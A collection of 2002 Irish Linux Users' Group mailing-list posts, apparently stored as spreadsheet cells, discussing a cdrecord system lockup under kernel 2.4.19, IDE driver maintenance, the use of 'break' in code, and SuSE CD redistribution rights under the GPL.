&gt; scsi over ide kernel modules.  I was running kernel 2.4.18 until
&gt; probably last weekend when I noticed 2.4.19 was out.  Downloaded patch
&gt; and installed new kernel with no real problems.  This morning I went to
&gt; burn a CDROM, and the system locked hard.  Rebooting into 2.4.18 allowed
&gt; cdburning to work fine.
&gt; 
&gt; This problem is very reproducible (on my system at least).
&gt; the cdrecord command I was using was
&gt;     cdrecord -v speed=4 blank=fast dev=0,1,0 -data bak.iso
&gt; The blanking appears to go ok, but when it tries to write data, it just
&gt; locks up the entire system (can't ping it from outside even).  AFAICS,
&gt; the system just stops.  Hard reset is only way back in, and when it does
&gt; reboot, I cannot see anything useful in any logfiles (/var/log/messages
&gt; /var/log/kern.log /var/log/syslog, at any rate).
&gt; cdrecord -scanbus works fine and reports the two pseudo-scsi devices (my
&gt; cdr drive and my cdrw).
&gt; The same lock occurs even if there is no blanking.
&gt; 
&gt; I tried upgrading to 2.4.20-pre1-ac1 (on assumption that if there was a
&gt; kernel issue it might have been fixed in these patches), but it gives
&gt; the same error.  I also downloaded and compiled the source for
&gt; cdrecord 1.1.10, and installed it instead of the debian package (i was
&gt; wondering if maybe there was some compile option the packager had used
&gt; which maybe would cause the problem), and still the problem persisted.
&gt; 
&gt; Anyway, I'm completely stumped.  Google searching has not done me much
&gt; good, and I'm a little bit lost.  What I'd like to know is
&gt; a)  How to fix the problem ;-)
&gt; b)  Is this likely to be an application or kernel problem?  The severity
&gt;     of the crash would make me suspect it is a kernel problem, but I'm
&gt;     not very knowledgeable on these things.
&gt; c)  Should I post a description of this to the kernel mailing list? If
&gt;     this is an appropriate course of action, are there any tips (beyond
&gt;     the guidelines on kernel.org)?
&gt; 
&gt; Like I said, I'm lost on this one, so any info is very gratefully
&gt; received.
&gt; mick
&gt; -- 
&gt; Michael Conry   Ph.:+353-1-7161987, Web: http://www.acronymchile.com
&gt; Key fingerprint = 5508 B563 6791 5C84 A947  CB01 997B 3598 09DE 502C
&gt; 
&gt; -- 
&gt; Irish Linux Users' Group: ilug@linux.ie
&gt; http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
&gt; List maintainer: listmaster@linux.ie
&gt; 
-- 
Mail sent on Mandkrake 8.2 ext3 k2419 AMD 1.4
"Piece by Piece, the penguins are taking my sanity apart ..."
http://frlinux.net - frlinux@frlinux.net
http://gentoofr.org - Portail Francais sur Gentoo Linux
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On 0020 +0100 %{!Sat, Aug 10, 2002 at 12:11:50PM +0100}, FRLinux wrote:
&gt; Hello,
&gt; 
&gt; I have been using 2.4.19 since a couple of days on a Mandrake 8.2 with
&gt; standard RPMs for cdrecord and it didn't give any hard locks on it at
&gt; all, i've already burnt a couple of CDs.
Thanks for that.  I'd sort of suspected that if it was a widespread
problem it would have already been fixed.  Starting to look more likely
it is a mistake/misconfiguration on my part, though I still don't know
where to look for the mistake/misconfiguration.
m-- 
Michael Conry   Ph.:+353-1-7161987, Web: http://www.acronymchile.com
Key fingerprint = 5508 B563 6791 5C84 A947  CB01 997B 3598 09DE 502C-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sat, Aug 10, 2002 at 12:11:50PM +0100, FRLinux mentioned:
&gt; I have been using 2.4.19 since a couple of days on a Mandrake 8.2 with
&gt; standard RPMs for cdrecord and it didn't give any hard locks on it at
&gt; all, i've already burnt a couple of CDs. Stephane, don't you have a SCSI CD burner though ?John -- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">the problem with yast2 comes when you try to install
off a harddissssk, its like its already mounted it?http://digital.yahoo.com.au - Yahoo! Digital How To
- Get the best out of your PC!-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, 2002-08-09 at 19:13, Paul Linehan wrote:
&gt; I'm looking for the disks for SUSE 8. Does anybody
&gt; have them for a reasonable price?First you complain about the supposed lack of threading
in Internet Mail, and then you reply to one of the messages
in that thread on an unrelated topic, messing things up for
those of us with threading turned on?Even Outlook Express does threading!Sigh...Nick-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, 2002-08-08 at 13:10, Padraig Brady wrote:
&gt; Yikes, hope he's not serious!The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can't do any development themselves while
IDE is broken. Hopefully the 2.4 IDE port should help.
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, 2002-08-08 at 12:18, Dave Wilson wrote:
&gt; Despite being one of Dijkstra's brain-damaged children who learned BASIC 
&gt; at an early age :) I never use GOTO anymore (or any of its bastard 
&gt; offspring like break, continue, fudged function calls with sleight of 
&gt; hand in the variables). My code is longer than it might be if I had used You don't use break? What about case statement blocks, or leaving a for
or while loop when you know you're finished?
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; The impression I get from reading lkml the odd time is
&gt; that IDE has gone downhill since Andre Hedrick was 
&gt; effectively removed as maintainer. Martin Dalecki seems
&gt; to have been unable to further development without 
&gt; much breakage. Hmm... begs the question, why remove Handrick?
If it ain't broke, don't fix it.
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">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
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sun, 11 Aug 2002, wintermute wrote:&gt; Hmm... begs the question, why remove Handrick?andre seems to have a peculiar way of interacting with people on 
linux-kernel. martin otoh gets on fine with people, but doesnt /seem/ 
to have his head fully around the ide code yetÂ¹. &gt; If it ain't broke, don't fix it.however, how do you add features? eg tagged commands, udma100, 133, 
etc.. serial ATA, new chipsets. plus the IDE code might be fine, but 
lots of drives and chips have bugs, which need working around.all that said, Linus says he does his development on an IDE machine
and hasnt had any problems.1. judging from comments on l-k.regards,
-- 
Paul Jakma	paul@clubi.ie	paul@jakma.org	Key ID: 64A2FF6A
	warning: do not ever send email to spam@dishone.st
Fortune:
The surest way to remain a winner is to win once, and then not play any more.
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Quoting Paul Linehan (plinehan@yahoo.com):&gt; Anyway, I should have initiated a new thread for my different request
&gt; about S.u.S.E. CDs.You'll probably want to buy a retail boxed set, e.g., via mail order.
The only editions of SuSE for i386 that are lawful to duplicate and
redistribute are as follows:SuSE Evaluation:  This is a single-CD ISO9660 image, currently at v. 7.0. 
If you don't mind having only one disk's worth of SuSE, and being
several revisions behind the boxed-set editions, this is quite good and 
recommended.SuSE Live Eval:  Another CD image, currently at v. 8.0, but this one
doesn't install to hard drives at all:  It's a demo disk.SuSE FTP Edition (for lack of an official name):  Not a CD image, but
the contents of ftp://ftp.suse.com/pub/suse/i386/current/ .  You would
have to mirror the ftp directory tree, and then figure out how to
install (e.g., over NFS).  Currently at v. 8.0.There are three (non-redistributable) boxed-set editions, at different
price points.I'm assuming in the above that you're talking about an i386-architecture
computer.  Slightly different answers apply for Alpha, IA64, SPARC, PPC,
SPARC64, PPC64, or S390.-- 
Cheers,                   "Teach a man to make fire, and he will be warm 
Rick Moen                 for a day.  Set a man on fire, and he will be warm
rick@linuxmafia.com       for the rest of his life."   -- John A. Hrastar-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Damian.SuSe has a Sparc version I previously been running on a Sun Ultra 5 at 
least. Worked fine, albeit a bit slow... ;)//AndersAt 14:32 09/08/2002, Damian O' Sullivan wrote:
&gt;I use gnome here on half a dozen sunray 150 boxen. Been trying to get linux
&gt;on them for along time with mixed results.. Has anyone succeeded in this?
&gt;
&gt; &gt; -&gt; It does work on SunRays. Just install it normally on the
&gt; &gt; server, the sun
&gt; &gt; install will make the necessary changes to the dtlogin screen
&gt; &gt; and you can just
&gt; &gt; select gnome from there. AFAIK you can do this for any window
&gt; &gt; manager. But I
&gt; &gt; don't admin sunray servers so I'm not fully aware of the
&gt; &gt; issues or exact
&gt; &gt; requirements.
&gt; &gt;
&gt; &gt; Cheers,
&gt; &gt; ~Al
&gt; &gt;
&gt;
&gt;
&gt;--
&gt;Irish Linux Users' Group: ilug@linux.ie
&gt;http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
&gt;List maintainer: listmaster@linux.ie
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; First you complain about the supposed lack of
&gt; threading in Internet Mail, and then you reply to
&gt; one of the messages in that thread on an unrelated
&gt; topic, messing things up for those of us with
&gt; threading turned on?&gt; Even Outlook Express does threading!
&gt; Sigh...
I apologise for wasting your time.I follow this list from home, and thus use
a yahoo account. I haven't been able to find
a threading mechanism for this, plus the
fact that the list can start to fill up
my inbox after about a week of no pruning.This is the reason for my initial grumbling. I 
would like to be able to follow what's going
on without clogging up my yahoo account.
Anyway, I should have initiated a new thread for my
different request about S.u.S.E. CDs. I won't repeat
my error!
Again, my humble apologies.Paul... 
&gt; Nickp.s. accidentally emailed privately - sorry!
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</si>
  <si>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 I decided to try out GarGnome, to see what gnome2 looks like. It's
pretty, I'll give it that. However, there seemed to be loads of bugs - sawfish threw wobblers all
over the place, so I tryed out metacity - which doesn't have a GUI
configurator, and arsed if I'm going back to the fvwm days when you had to
set settings by hand, without an idea what the values looked like. So, I went back to 1.4 - and now sawfish can't start applets (yes, I did
change the LD_LIBRARY_PATH back) and the panel can't make new workspaces. Any ideas what could have happened ? Would sawfish 2.0 silently change
the config files &amp; break them?Kate
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">
Rick Moen  a Ã©crit:&gt; You'll probably want to buy a retail boxed set,
&gt; e.g., via mail order.&gt; The only editions of SuSE for i386 that are lawful
&gt; to duplicate and redistribute are as follows:
I'm confused. I thought it was GPL'ed and
that the money you paid SuSE was for your
60 day support or whatever? I don't particularly need support, so I'm not 
really interested in purchasing a set of disks 
with 4 billion apps which I'll never use.&gt; I'm assuming in the above that you're talking about
&gt; an i386-architecture computer. 
Yes, thanks for your input. Anyway, I've a friend
with 7.3 pro, so I'll just ask him.Paul...
&gt; Rick Moen___________________________________________________________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</si>
  <si>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 wintermute  a Ã©crit:
&gt; &gt; I'm confused. I thought it was GPL'ed and
&gt; &gt; that the money you paid SuSE was for your
&gt; &gt; 60 day support or whatever?  
&gt; No, as of oh, about a year to a year and a half ago
&gt; SuSE revoked it's free offering of it's retail
&gt; distro.&gt; Sometime about the start of the great slump, SuSE
&gt; pulled free release of it's main x86 product.
Fine - nobody can oblige SuSE to do anything other
than put up the ftp version, but surely they
can't prevent a CD owner from burning a copy and
giving it to me?What is the GPL all about then?&gt; I'm not sure on the details of it, but I think SuSE
&gt; have probably done an OpenBSD of the cd they sell?
But *_surely_* they cannot BSD Linux? It's not
theirs to BSD! 
&gt; I could be wrong, I don't use SuSE so haven't
&gt; investigated, but essentially the only 'free'
&gt; version of SuSE will be it's tp offering.
Nobody can oblige them to give away anything
other than ftp - I'm not asking for that. I'm
asking for somebody who has Linux (GPL'ed) to
burn a copy for me and give it to me in exchange
for a reasonable consideration (say, the price of
the CDs and a bottle of Frascati or a couple of
pints?).
What does the GPL mean now?
I don't want their 60 days of free email support
or anything similar (if I did, I would pay for
it).
Paul...
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</si>
  <si>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 
&gt; &gt; No, as of oh, about a year to a year and a half ago
&gt; &gt; SuSE revoked it's free offering of it's retail
&gt; &gt; distro.
&gt; 
&gt; &gt; Sometime about the start of the great slump, SuSE
&gt; &gt; pulled free release of it's main x86 product.
&gt; 
&gt; 
&gt; Fine - nobody can oblige SuSE to do anything other
&gt; than put up the ftp version, but surely they
&gt; can't prevent a CD owner from burning a copy and
&gt; giving it to me?
&gt; 
&gt; What is the GPL all about then?Not everything on the SuSE CDs is GPL-ed.  IIRC, YAST
has a more "proprietary" license.  There may be other
third-party commercial products on there as well, which
cannot be freely copied under the GPL.Later,
Kenn-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Quoting Paul Linehan (plinehan@yahoo.com):&gt; What is the GPL all about then?(1) I'm sure you are not _actually_ under the delusion that everything
on a typical Linux distribution issued subject to the terms of the GNU
GPL.  For one thing, it seems difficult to imagine you _not_ being aware
that XFree86 is under the X/MIT licence, that Perl is under the Perl
Artistic Licence, that Apache is under the Apache licence, and that
numerous BSD utilities are under the BSD licence.Furthermore, xv, Acrobat Reader, pine, pico, Netscape Communicator, and
a whole slew of other applications typically included aren't under any
open source licence at all, but rather are proprietary.(2)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nobody's decided to give you a lawful copy.&gt; But *_surely_* they cannot BSD Linux? It's not theirs to BSD!Again, you seem to be under a misconception.  If you check, I'm quite
confident you'll see that SuSE are in full compliance with GPL v. 2's
source-code access provisions concerning GPLed code included in their
distribution.  And no, nobody has the legal right to alter licence terms
to someone else's copyrighted property.  But you have not cited any
reasons to believe that SuSE have done any of those things.
&gt; Fine - nobody can oblige SuSE to do anything other than put up the ftp
&gt; version, but surely they can't prevent a CD owner from burning a copy
&gt; and giving it to me?See below.  You and the CD owner would be committing copyright violation.
SuSE Linux AG are rather unlikely to knock down your door and haul you
down to a judge, if that's what you're asking.&gt; Nobody can oblige them to give away anything other than ftp - I'm not
&gt; asking for that. I'm asking for somebody who has Linux (GPL'ed) to
&gt; burn a copy for me and give it to me in exchange for a reasonable
&gt; consideration (say, the price of the CDs and a bottle of Frascati or a
&gt; couple of pints?).You appear confused between Linux the kernel (which is a copyrighted
work to which source code access is guaranteed under the GNU GPL if
you've received a lawful copy of a binary version) and the rather
imprecise concept of a "Linux distribution", which is a number of works
under diverse licence terms collected onto some media.In the case of SuSE's boxed sets -- which are NOT lawful to duplicate
and redistribute in their entirety -- at least a couple of the
applications on them (YaST, YaST2, and the installer program) are
proprietary copyrighted works of SuSE Linux AG.  In the general case,
duplicating and redistributing CD-ROMs containing those works is
copyright infringement.  Illegal.  No amount of hand-waving about the
GNU GPL is going to change that.(SuSE permit people to duplicate and redistribute the "evaluation" and
"live-eval" CD editions, despite that fact, as long as it is not "for
value".)If you want to have a SuSE boxed set to install from, buy one.&gt; What does the GPL mean now?Suggestion:  Read it.  I would guess you've not yet done so.-- 
Cheers,                                             Live Faust, die Jung.
Rick Moen
rick@linuxmafia.com-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Quoting Kenn Humborg (kenn@bluetree.ie):&gt; Not everything on the SuSE CDs is GPL-ed.  IIRC, YAST has a more
&gt; "proprietary" license.  There may be other third-party commercial
&gt; products on there as well, which cannot be freely copied under the
&gt; GPL.Indeed.The ftp'able tree (e.g., 8.0 for i386) contains to my knowledge only
items whose licences allow public redistribution, even where they aren't
open source.  The retail boxed sets (Personal Edition, Professional
Edition, and Enterprise Edition) _add_ a number of additional
proprietary apps that are very much _not_ freely redistributable.
I made a list, a while back:Freely redistributable proprietary apps in SuSE
----------------------------------------------
UofW pine/pico/pilot
John Bradley's xv graphics tool
T.C. Zhao and Mark Overmars's xforms/xformsd graphics toolkit
(some others)  NON-freely redistributable apps (in boxed sets):
-----------------------------------------------
Siemens AG's DB4Web middleware
Poet Software Corp. FastObjects SDK for Java and C++
IBM Java 2
Intel-v92ham winmodem driver
MainConcept GmbH's MainActor video-editing package
www.mimer.com's MimerSQL
MGE UPS Systems's Personal Solution Pac (MGE power management software)
Real Networks's RealPlayer
Adobe Acrobat Reader
Software AG's ADABAS D
H+BEDV Datentechnik GmbH's AntiVir V
Knox Sofware Comm.'s Arkeia
Datan's dataplore digital-signal analysis package
Enterprise Solution Server (ESS) ERP system
Sun Microsystems Java2
Borland Kylix Open Edition
Moneydance
OpenEIS enterprise information system
Opera Software's Opera browser
Heisch Automatisierungstechnik's rk512 serial interface to Simatic S5 /
    S7 plcs
SAP database
Sun Microsystems Star Office
VMware, Inc's VMware
http://www.vshop.org/'s vshop e-commerce software for MySQL
  All of the latter category either are available only via retail sale, or
are available lawfully on the public Internet only from authorised
distribution sites or on CDs from authorised distributors.  The exact
terms differ.For example, you can download Borland Kylix Open Edition from
borland.com, free of charge -- but you'll notice there's no mention of
any right to redistribute.  That right is reserved by default to the
copyright owners, and Borland doesn't include it in the Kylix
proprietary licence.-- 
Cheers,               "We're sorry; you have reached an imaginary number.
Rick Moen             Please rotate your 'phone ninety degrees and try again."
rick@linuxmafia.com-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 2002-08-12 at 12:09, Albert White - SUN Ireland wrote:
&gt; If you want to stop in the middle of that because some condition is set then 
&gt; you probably should have used a while loop instead of `for`:
&gt; i:=0
&gt; flag:=false
&gt; while [ i != 100 &amp;&amp; flag != true ]
&gt; do
&gt; 	....
&gt; 	# found our special case set flag to jump out of loop
&gt; 	flag:=true
&gt; 	....
&gt; 	i++;
&gt; done
&gt; 
&gt; If you're using a break or similar construct in a while loop then you might 
&gt; want to rethink your guard condition.Good point, I didn't think of that. However, that doesn't help with a
case statement, which IMHO is cleaner than using an if statement if you
have a lot of branches... but then again maybe that should be refactored
away with polymorphism :)
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; &gt; If you're using a break or similar construct in a while loop 
&gt; then you might 
&gt; &gt; want to rethink your guard condition.
&gt; 
&gt; Good point, I didn't think of that. However, that doesn't help with a
&gt; case statement, which IMHO is cleaner than using an if statement if you
&gt; have a lot of branches... but then again maybe that should be refactored
&gt; away with polymorphism :)Well, you should consider 'break' inside a 'select' statement
to be part of the syntax, rather than a control flow modifier.A _mandatory_ part of the syntax, at that.Later,
Kenn
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">
"John P. Looney"  a Ã©crit:&gt; &gt; I'm confused. I thought it was GPL'ed and
&gt; &gt; that the money you paid SuSE was for your
&gt; &gt; 60 day support or whatever? 
&gt;  The RPMS are. The distribution as a whole work is
&gt; copyright of SuSE.
This IMHO, goes against the spirit of GPL. 
Thanks for the info.
Is there any distro (pref. Mandrake or failing
that, Red Hat or other) out there for which people 
have disks, are prepared to burn copies and are 
allowed give to me for a small fee?
TIA.
Paul... 
&gt; Kate___________________________________________________________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</si>
  <si>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Quoting Nick Murtagh (nickm@go2.ie):&gt; The same one as provided on www.sapdb.org? 
&gt; Which is released under the GPL/LGPL?I honestly don't know.  I made that list a long time ago, and certainly
didn't re-research it before posting it today.  So, I offer three
candidate explanations:1.  I muffed that part, the first time, and was talking through my hat.
2.  SAP had a proprietary version licensed to SuSE at the time.
3.  SAP still have one licensed to SuSE today.I'm not sure which applies.  #1 is certainly a good possibility.
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 2002-08-12 at 19:26, Rick Moen wrote:
&gt; NON-freely redistributable apps (in boxed sets):
&gt; -----------------------------------------------
&gt; SAP databaseThe same one as provided on www.sapdb.org? 
Which is released under the GPL/LGPL?
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 2002-08-12 at 19:56, Kenn Humborg wrote:
&gt; Well, you should consider 'break' inside a 'select' statement
&gt; to be part of the syntax, rather than a control flow modifier.Why? When it comes down to the assembly level, it gets turned
into some kind of jump instruction. Should I pretend I don't know
this when I'm programming?&gt; A _mandatory_ part of the syntax, at that.It's not mandatory. You can leave out the break, and the flow
of control will continue to the next case. Which can be useful
in certain circumstances.Nick
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, Aug 12, 2002 at 07:59:21PM +0200, Paul Linehan wrote:
&gt; 
&gt; "John P. Looney"  a Ã©crit:
&gt; 
&gt; &gt; &gt; I'm confused. I thought it was GPL'ed and
&gt; &gt; &gt; that the money you paid SuSE was for your
&gt; &gt; &gt; 60 day support or whatever? 
&gt;  
&gt; &gt;  The RPMS are. The distribution as a whole work is
&gt; &gt; copyright of SuSE.
&gt; 
&gt; 
&gt; This IMHO, goes against the spirit of GPL. 
&gt; 
&gt; 
&gt; Thanks for the info.
&gt; 
I can copy the RedHat official download ISO's. I can't
call it redhat if I sell it, so I can give you copies
of thread linux 7.3 if you want.Failing that, I have the 7 CD's from Woody (Debian 3.0).
Otheriwse, you need to find  a different source.L.-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Quoting John P. Looney (valen@tuatha.org):&gt;  The RPMS are. The distribution as a whole work is copyright of SuSE.I've not seen any claim from SuSE of copyright over the distribution 
as a whole.  (That would be a "compilation copyright", to use the legal
term.)  But they definitely assert (and in fact own) copyright over
YaST, YaST2, and the associated installer program.So, if one wanted to distribute a version of SuSE free of encumbrances
from SuSE Linux AG, one would merely have to write a replacement
installer and do without YaST/YaST2 (and probably a few other things
they wrote).  A Simple Matter of Programming.-- 
Cheers,               "That article and its poster have been cancelled." 
Rick Moen                   -- David B. O'Donnel, sysadmin for America Online
rick@linuxmafia.com-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Quoting wintermute (cout@eircom.net):&gt; No, as of oh, about a year to a year and a half ago
&gt; SuSE revoked it's free offering of it's retail distro.
&gt; Sometime about the start of the great slump, SuSE pulled
&gt; free release of it's main x86 product.
&gt; 
&gt; So the last free version of SuSE you could get via a Linux Format 
&gt; par example was 7.0 I think.Let's limit the discussion to x86, to simplify.  There are some
additional complications for some of the other architectures.
(Essentially, they make most of the other architectures' ISO images
available gratis, because they aren't selling boxed sets and want the
public to have them anyway.  The ISOs include third-party proprietary
apps, but of necessity not the highly-restricted ones available in 
boxed set editions.)(1) You can get a single-disk ISO9660 image of SuSE "evaluation"
edition, version 7.0, _lots_ of places, including here:ftp://ftp.suse.com/pub/suse/i386/evaluation-7.0/evaluation-7.0.iso(2) You could "wget -r" (or equivalent) the entire 8.0 FTP Edition (for
lack of an official name for it) from here (or mirror sites):ftp://ftp.suse.com/pub/suse/i386/8.0/Please note the restricted rights granted for use of the SuSE-originated
YaST program specifically, stated here:ftp://ftp.suse.com/pub/suse/i386/8.0/COPYRIGHT.yastA grant of limited redistribution rights to the distribution as a whole 
(apparently covering the FTP Edition and the Evaluation Edition) is
stated here: ftp://ftp.suse.com/pub/README.mirror-policy   Quoting:     please make sure that you meet the following conditions if
     you intend to mirror ftp.suse.com:   - SuSE Linux (YaST in particular) may not be reproduced on
     CDs or other media FOR VALUE. Reproduction for personal
     or educational use is explicitly allowed and encouraged.&gt; I'm not sure on the details of it, but I think SuSE have
&gt; probably done an OpenBSD of the cd they sell?OpenBSD Foundation assert a compilation copyright over the OpenBSD
official ISO9660 image.  A compilation copyright is the copyright
monopoly that, for example, the editor of a set of third-party short
stories receives.  Even though he didn't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don't have anywhere near enough creative
content to support an overreaching telco's claim of compilation
copyright.  (The court politely said "Nice try", in effect.)The OpenBSD Foundation's claim may be a bit of a legal bluff, too.
Theoretically, one could get around it by creating a slightly different
set of ISO9660 images, thereby finessing the claim of compilation
copyright.  But nobody bothers, because OpenBSD Foundation actually 
charges only a very reasonable price for jewel-case sets, and nobody
wants to endure the barrage of hatemail from Theo &amp; co.I've never seen any claim from SuSE of compilation copyright on its ISOs
or distribution as a whole.&gt; I could be wrong, I don't use SuSE so haven't investigated,
&gt; but essentially the only 'free' version of SuSE will be it's
&gt; ftp offering.Again, the "FTP Edition" and the Evaluation Edition may be redistributed
more-or-less freely, as long as it's not "for value".  (Ditto the
"live-eval" edition, which is a demo only.)  The three boxed sets'
contents may not.-- 
Cheers,              A good man has few enemies; a ruthless man has none.
Rick Moen                                       
rick@linuxmafia.com-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Quoting Nick Murtagh (nickm@go2.ie):
&gt; On Mon, 2002-08-12 at 19:26, Rick Moen wrote:
&gt;
&gt;&gt; NON-freely redistributable apps (in boxed sets):
&gt;&gt; -----------------------------------------------
&gt;&gt; SAP database
&gt; 
&gt; The same one as provided on www.sapdb.org? 
&gt; Which is released under the GPL/LGPL?Looking at http://www.sapdb.org/history.htm , it seems that SAP went
open-source some time in 2000, so my information likely was correct
at the time I compiled that list.In addition, please note that, just because a company decides to go open
source with a codebase as of some new release version, that doesn't make
all versions ever released open source retroactively.  A licence
attaches to a _copy_ of a creative work.  So, if there was a
proprietary, non-redistributable copy in SuSE boxed sets, it's still
proprietary and non-redistributable -- unless SAP AG decided to mail out
a separate permission grant for it.
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Quoting Paul Linehan (plinehan@yahoo.com):&gt; I'm confused. I thought it was GPL'ed and that the money you paid SuSE
&gt; was for your 60 day support or whatever? Yes, you're confused.A Linux distribution (_any_ Linux distribution) contains lots and lots
of separate codebases.  Some are under the GNU GPL.  Many are not.  Are
you clear on this point, now?  This is my second try.  One suspects that
you actually understand perfectly, but just don't like it.You're further confused if you think the GNU GPL gives you the right to
get covered software for free.  It does not.  It provides that _if_
you've lawfully received a copy of the covered binary version, you have
rights to also receive the matching source code.&gt; I don't particularly need support, so I'm not really interested in
&gt; purchasing a set of disks with 4 billion apps which I'll never use.Then, if you nonetheless want a SuSE boxed set's contents, the only way
you can do that without copyright violation _and_ without having to pay
the purchase price is to get someone to _give_ (not "lend" or duplicate) 
you his copy.&gt; Yes, thanks for your input. Anyway, I've a friend with 7.3 pro, so
&gt; I'll just ask him.Ask him _what_?  If you're asking him to "lend" or duplicate his CDs,
then you'll be ripping off SuSE Linux AG illegally.Don't like SuSE's product licensing?  Write your own distribution.  You
can even grab most of what you need _from SuSE_.  All you have to do is 
heed the licensing terms on the individual pieces.What,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Hi! I'm a .signature virus! Copy me into your ~/.signature  to help me spread.
Hi!p I'm a .signature spread virus! Copy into your ~/.signature to help me
Hilp I'm .sign turepread virus! into your ~/.signature! help me! Copy
Help I'm traped in your ~/signature help me!       -- Joe Slater-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Rick Moen  wrote:
&gt; Don't like SuSE's product licensing?  Write your own distribution.  You
&gt; can even grab most of what you need _from SuSE_.  All you have to do is 
&gt; heed the licensing terms on the individual pieces.
How unimaginably difficult is this to do?
There are as far as I know, no Linux kernel hackers, nor distros that originate from this fair island right?
Right.Yes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packaging.That said other *LUG have done interesting things like making blackbox.Perhaps making a distro would be ..... umm.... fun.Just a pseudo random thought.
I'm only laughing on the outside 
My smile is just skin deep 
If you could see inside I'm really crying 
You might join me for a weep.
&lt;&gt;-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">
Rick Moen  a Ã©crit:&gt; &gt; I'm confused. I thought it was GPL'ed and that 
&gt; &gt; the money you paid SuSE was for your 60 day
&gt; &gt; support or whatever? 
&gt; Yes, you're confused.
I *_was_* confused.
&gt; A Linux distribution (_any_ Linux distribution)
&gt; contains lots and lots of separate codebases.
&gt; Some are under the GNU GPL. Many are not.
Indeed - that I actually had understood prior
